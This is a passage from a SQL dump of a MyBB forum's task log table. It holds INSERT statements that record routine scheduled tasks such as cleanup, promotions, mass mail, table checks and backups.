task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10608', '5', '1350398760', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10609', '3', '1350398762', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10610', '9', '1350399340', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10611', '3', '1350399552', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10612', '1', '1350399949', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10613', '7', '1350399973', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10614', '5', '1350399977', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10615', '9', '1350400459', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10616', '5', '1350401224', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10617', '9', '1350401256', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10618', '3', '1350401476', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10619', '9', '1350402178', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10620', '5', '1350402504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10621', '9', '1350402971', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10622', '3', '1350403146', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10623', '1', '1350403921', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10624', '5', '1350403941', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10625', '7', '1350403935', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10626', '9', '1350403954', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10627', '5', '1350404704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10628', '9', '1350404766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10629', '3', '1350405003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10630', '9', '1350405608', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10631', '5', '1350406154', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10632', '9', '1350406525', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10633', '3', '1350406836', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10634', '1', '1350406838', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10635', '7', '1350406900', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10636', '5', '1350407305', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10637', '9', '1350407673', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10638', '5', '1350408307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10639', '9', '1350408386', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10640', '3', '1350408721', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10641', '9', '1350409208', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10642', '5', '1350409535', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10643', '9', '1350410363', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10644', '3', '1350410366', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10645', '1', '1350410699', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10646', '7', '1350410709', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10647', '5', '1350410740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10648', '9', '1350411544', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10649', '5', '1350412193', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10650', '9', '1350412334', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10651', '3', '1350412337', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10652', '9', '1350413693', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10653', '5', '1350413741', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10654', '9', '1350413780', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10655', '3', '1350414325', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10656', '1', '1350414370', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10657', '7', '1350414435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10658', '5', '1350414438', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10659', '9', '1350415273', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10660', '5', '1350415615', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10661', '9', '1350415620', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10662', '3', '1350415892', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10663', '9', '1350416417', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10664', '5', '1350416709', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10665', '9', '1350417432', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10666', '3', '1350417578', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10667', '1', '1350417601', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10668', '7', '1350417604', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10669', '5', '1350417984', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10670', '9', '1350418293', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10671', '5', '1350419122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10672', '9', '1350419129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10673', '3', '1350419411', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10674', '9', '1350420015', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10675', '5', '1350420306', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10676', '9', '1350420944', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10677', '3', '1350421142', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10678', '1', '1350421209', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10679', '7', '1350421223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10680', '5', '1350421502', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10681', '9', '1350421806', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10682', '5', '1350422701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10683', '9', '1350422745', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10684', '3', '1350423163', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10685', '9', '1350423765', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10686', '5', '1350423913', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10687', '9', '1350424580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10688', '3', '1350424742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10689', '1', '1350424804', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10690', '7', '1350424817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10691', '5', '1350425334', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10692', '9', '1350425438', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10693', '5', '1350426301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10694', '9', '1350426379', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10695', '3', '1350426613', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10696', '9', '1350427212', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10697', '5', '1350427512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10698', '9', '1350428126', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10699', '3', '1350428370', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10700', '1', '1350428422', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10701', '7', '1350428445', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10702', '5', '1350428751', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10703', '9', '1350429006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10704', '5', '1350429925', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10705', '9', '1350429937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10706', '3', '1350430243', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10707', '9', '1350430952', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10708', '5', '1350431514', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10709', '9', '1350431732', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10710', '3', '1350432078', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10711', '1', '1350432276', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10712', '2', '1350432321', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10713', '7', '1350432337', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10714', '11', '1350432441', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10715', '5', '1350432467', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10716', '9', '1350432639', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10717', '5', '1350433503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10718', '9', '1350433513', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10719', '3', '1350433856', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10720', '9', '1350434422', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10721', '5', '1350434703', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10722', '9', '1350435305', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10723', '3', '1350435559', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10724', '1', '1350435608', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10725', '7', '1350435619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10726', '5', '1350435968', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10727', '9', '1350436221', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10728', '5', '1350437104', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10729', '9', '1350437158', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10730', '3', '1350437464', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10731', '9', '1350438013', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10732', '5', '1350438342', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10733', '5', '1350438342', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10734', '9', '1350439114', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10735', '3', '1350439144', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10736', '1', '1350439214', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10737', '7', '1350439235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10738', '5', '1350439983', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10739', '9', '1350440131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10740', '5', '1350440702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10741', '9', '1350440710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10742', '3', '1350441012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10743', '9', '1350441615', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10744', '5', '1350441932', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10745', '9', '1350442534', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10746', '3', '1350442744', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10747', '1', '1350442802', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10748', '7', '1350442820', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10749', '5', '1350443108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10750', '9', '1350443449', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10751', '5', '1350444346', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10752', '9', '1350444383', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10753', '3', '1350444666', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10754', '9', '1350446024', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10755', '5', '1350446284', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10756', '9', '1350446309', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10757', '3', '1350446347', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10758', '1', '1350446469', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10759', '7', '1350446495', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10760', '5', '1350446748', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10761', '9', '1350447097', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10762', '5', '1350447924', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10763', '9', '1350447995', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10764', '3', '1350448203', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10765', '9', '1350448808', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10766', '5', '1350449106', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10767', '9', '1350449978', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10768', '3', '1350449984', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10769', '1', '1350450039', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10770', '7', '1350450044', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10771', '5', '1350450352', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10772', '9', '1350450653', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10773', '5', '1350451506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10774', '9', '1350452094', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10775', '3', '1350452403', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10776', '9', '1350452982', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10777', '5', '1350453522', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10778', '9', '1350453581', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10779', '3', '1350454512', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10780', '1', '1350454561', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10781', '7', '1350454563', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10782', '5', '1350454570', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10783', '9', '1350454779', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10784', '5', '1350455353', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10785', '9', '1350455422', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10786', '3', '1350455430', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10787', '9', '1350456059', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10788', '5', '1350456326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10789', '9', '1350456909', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10790', '3', '1350457161', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10791', '1', '1350457248', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10792', '7', '1350457251', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10793', '5', '1350458734', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10794', '9', '1350459200', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10795', '3', '1350459224', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10796', '9', '1350459665', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10797', '5', '1350459909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10798', '9', '1350460690', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10799', '3', '1350460749', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10800', '1', '1350460864', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10801', '7', '1350460920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10802', '5', '1350461150', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10803', '9', '1350461475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10804', '5', '1350462311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10805', '9', '1350462346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10806', '3', '1350462679', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10807', '9', '1350463252', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10808', '5', '1350463533', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10809', '9', '1350464465', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10810', '3', '1350464657', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10811', '1', '1350465767', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10812', '7', '1350465937', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10813', '5', '1350466140', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10814', '9', '1350466198', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10815', '3', '1350466364', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10816', '9', '1350467242', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10817', '5', '1350468296', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10818', '9', '1350468402', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10819', '3', '1350469393', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10820', '1', '1350469405', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10821', '7', '1350469439', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10822', '5', '1350469442', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10823', '9', '1350469449', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10824', '5', '1350469602', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10825', '9', '1350469660', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10826', '3', '1350469800', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10827', '9', '1350470602', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10828', '5', '1350470705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10829', '9', '1350471474', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10830', '3', '1350471544', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10831', '1', '1350471602', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10832', '7', '1350471645', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10833', '5', '1350471988', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10834', '9', '1350472346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10835', '5', '1350473252', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10836', '9', '1350473978', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10837', '3', '1350473982', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10838', '9', '1350474703', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10839', '5', '1350474722', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10840', '9', '1350474906', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10841', '3', '1350475143', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10842', '1', '1350475215', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10843', '4', '1350475217', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10844', '7', '1350475223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10845', '5', '1350475785', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10846', '9', '1350475881', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10847', '5', '1350476965', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10848', '9', '1350477435', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10849', '3', '1350477440', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10850', '9', '1350478766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10851', '5', '1350478769', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10852', '3', '1350478816', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10853', '1', '1350478898', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10854', '7', '1350478902', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10855', '5', '1350479436', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10856', '9', '1350479726', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10857', '5', '1350480382', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10858', '9', '1350481469', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10859', '3', '1350481474', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10860', '5', '1350482298', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10861', '9', '1350482332', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10862', '3', '1350482343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10863', '1', '1350482428', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10864', '7', '1350482458', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10865', '5', '1350482705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10866', '9', '1350483082', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10867', '5', '1350483909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10868', '9', '1350484392', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10869', '3', '1350484395', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10870', '9', '1350486160', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10871', '5', '1350486167', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10872', '3', '1350486228', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10873', '1', '1350486476', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10874', '7', '1350486490', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10875', '5', '1350486500', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10876', '9', '1350487246', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10877', '5', '1350487508', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10878', '9', '1350487565', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10879', '3', '1350487803', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10880', '9', '1350488477', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10881', '5', '1350488720', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10882', '9', '1350489494', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10883', '3', '1350489632', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10884', '1', '1350489635', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10885', '7', '1350489637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10886', '5', '1350489914', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10887', '9', '1350490637', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10888', '5', '1350493191', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10889', '9', '1350493201', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10890', '3', '1350493229', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10891', '1', '1350493243', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10892', '7', '1350493247', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10893', '5', '1350493604', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10894', '9', '1350493853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10895', '5', '1350494876', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10896', '9', '1350494931', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10897', '3', '1350495097', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10898', '9', '1350495634', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10899', '5', '1350495949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10900', '9', '1350496559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10901', '3', '1350496833', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10902', '1', '1350496873', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10903', '7', '1350496932', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10904', '5', '1350497191', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10905', '9', '1350497410', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10906', '5', '1350498462', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10907', '9', '1350498516', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10908', '3', '1350498898', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10909', '9', '1350499248', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10910', '5', '1350499506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10911', '9', '1350500103', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10912', '3', '1350500355', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10913', '1', '1350500401', 'The hourly cleanup task successfully ran.'); INSERT INTO 